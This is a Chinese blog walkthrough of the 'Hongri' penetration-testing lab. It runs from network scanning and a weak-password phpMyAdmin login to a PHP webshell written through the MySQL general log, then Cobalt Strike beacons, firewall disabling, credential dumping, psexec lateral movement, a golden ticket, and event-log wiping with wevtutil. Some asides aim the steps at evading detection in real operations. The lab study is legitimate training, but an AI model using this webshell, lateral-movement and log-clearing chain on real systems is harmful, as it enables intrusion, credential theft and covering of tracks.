红日靶场通关

初始准备

首先是网络配置,看教程来的,我配置完的效果如下

windows7:(内:192.168.52.143 / 外:192.168.154.136)
windows2003:(内:192.168.52.141)
windows2008:(内:192.168.52.138)

kali:192.168.154.139  

win7外网的IP是自动获取的,每个人都不一样!

检查windows是否和我们的物理机以及外网相通:

ping通说明配置成功 。

配置完成后给四 台虚拟机拍快照

渗透测试

Kail进入phpadmin后台

扫描192.168.154.0网段(win7和外网连接的网卡)

nmap 192.168.154.0/24

也是扫描到了win7的IP以及他开放的端口 

然后扫描80(HTTP)和3306(MYSQL)端口

nmap 192.168.154.136 -p80,3306 -A -sV

-A(全面扫描) -sV(服务版本探测)

 然后扫描http://192.168.154.136/目录

dirb使用

-a     设置user-agent
-p     <proxy[:port]>设置代理
-c     设置cookie
-z     添加毫秒延迟,避免洪水攻击
-o     输出结果
-X     在每个字典的后面添加一个后缀
-H     添加请求头
-i     不区分大小写搜索

dirb http://192.168.154.136

这是我们想要扫描出来的东西,然后就知道了数据库管理工具的网络路径

浏览器访问后台  http://192.168.154.136/phpmyadmin/

root/root 弱密码登录 

成功登录 ,下一步就是尝试利用MYSQL日志在中写入木马,也叫shell

查看日志信息

SHOW VARIABLES LIKE '%general%'   

打开日志

日志读写默认是关闭的,所以我们要打开

SET GLOBAL general_log='on';      

 将MySQL的通用查询日志(general query log)的输出文件设置为指定的路径。

 set global general_log_file = 'C:/phpStudy/WWW/2.php'

  写入一句话木马

 SELECT '<?php @eval($_POST["cmd"]);?>'  

访问2.php,发现成功访问

然后上蚁剑连接 

网站就是内个,密码就是cmd

 然后就是用cs了,cs配置就不写了,就写用法了

创建监听器

创建 windows 可执行 exe 程序 

利用蚁剑上传后门,并启动 

然后就开始内网渗透 

回连间隔改为0(这只是靶场操作,实战不要用容易被gangan)

关闭防火墙(上线就关闭防火墙养成好习惯)

        shell netsh advfirewall set allprofiles state off        

 然后就要去提权

成功提权 记得修改将system的回连间隔也修改为0

内网信息收集


 简单的信息收集

shell ipconfig                                                                                         //查看网络

shell net user                                           //查看本地用户

shell net view                                                 //列举计算机名

shell net config Workstation        //查看当前计算机名、域、登录域等信息

shell net view /domain                                //看看几个域

这里得知52为内网网段 ,并且只有一个域

端口扫描

        浏览探测—>端口扫描—>52内网段

扫描结果如上

抓取明文密码

        抓明文密码等下横向要用

        凭证提权—>抓取明文密码

的知密码为123.com 

内网横向

        刚刚我们端口扫描的时候发现开放了445端口,可以创建SMB监听隧道

     (Windows上的SMB(Server Message Block)协议是一种网络文件共享协议,它允许用户在网络上的计算机之间访问文件和打印机等资源。)

 

切换攻击目标列表

右建选择—> 横向移动 —> psexec 

添加 用户名 密码 域名 -> 监听器 -> 对端连接的隧道

        监听器选择我们刚刚创建的SMB监听器,对端连接的隧道选择system权限的

 横向成功,进入域控,记得养成好习惯关防火墙 

权限维持(黄金票据)

黄金票据是指能够绕过认证授权(Authentication and Authorization)机制并获得所需权限的票据。这种票据可以被攻击者收集和利用,从而从系统内部获取高权限,甚至完全控制系统。

抓取 Hash 还有明文密码

        把SID,域名,复制下来等下黄金票据要用

        SID: S-1-5-20

        域名:GOD.ORG

 

 

黄金票据配置

        凭证提权—>黄金票据

成功配置,舒服了 

痕迹清除


        在渗透过程中,痕迹清除非常非常重要,不清除万一被溯源,容易被gangan

shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

完结撒花。。。

也是完成了,弄了两天多,人生中第一次完整的渗透测试,

以前看别的博主最后都会写一段励志语,我也来一段

“生活总是让我们遍体鳞伤,但到后来,那些受伤的地方一定会变成我们最强壮的地方。”

                                                                                                        —— 海明威《永别了武器》

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值